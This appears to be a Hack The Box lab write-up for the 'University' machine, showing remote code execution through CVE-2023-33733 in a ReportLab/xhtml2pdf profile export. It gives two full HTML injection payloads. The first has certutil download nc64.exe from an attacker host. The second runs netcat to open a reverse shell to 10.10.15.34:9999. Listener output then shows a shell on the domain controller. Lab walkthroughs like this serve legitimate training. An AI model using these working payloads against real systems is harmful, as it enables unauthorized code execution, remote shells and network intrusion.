CVE-2023-33733
The target web application has been suspected to be vulnerable to CVE-2023-33733 as the Profile Export feature relies on a supposedly outdated version of ReportLab. It was later revealed that xhtml2pdf is the underlying element being used to transform HTML to PDF.
The bio field takes HTML input
Planting Netcat Binary
<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('certutil.exe -urlcache -split -f http://10.10.15.34/nc64.exe %TEMP%\\nc64.exe') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
exploit
</font></para>
I can place the PoC here to have the target system download the Netcat binary
It sends out a POST request to the profile endpoint at /accounts/profile/ with the data corresponding those fields.
Exporting the profile
Netcat binary has been fetched
Reverse Shell
<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('%TEMP%\\nc64.exe 10.10.15.34 9999 -e cmd') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
exploit
</font></para>
I will update the profile again with the payload, executing the transferred Netcat binary
Executing by exporting
┌──(kali㉿kali)-[~/archive/htb/labs/university]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.15.34] from (UNKNOWN) [10.129.252.94] 60240
Microsoft Windows [Version 10.0.17763.6414]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Web\University> whoami
whoami
university\wao
C:\Web\University> hostname
hostname
DC
C:\Web\University> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter vEthernet (Internal-VSwitch1):
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::47c0:fbc9:2d7b:e4bb%6
IPv4 Address. . . . . . . . . . . : 192.168.99.1
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::5c4a:da33:e1f2:e210
Link-local IPv6 Address . . . . . : fe80::381c:7ab:c80:ef91%4
IPv4 Address. . . . . . . . . . . : 10.129.252.94
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:fe94:3911%4
10.129.0.1Initial Foothold established to the DC host as the wao account via exploiting CVE-2023-33733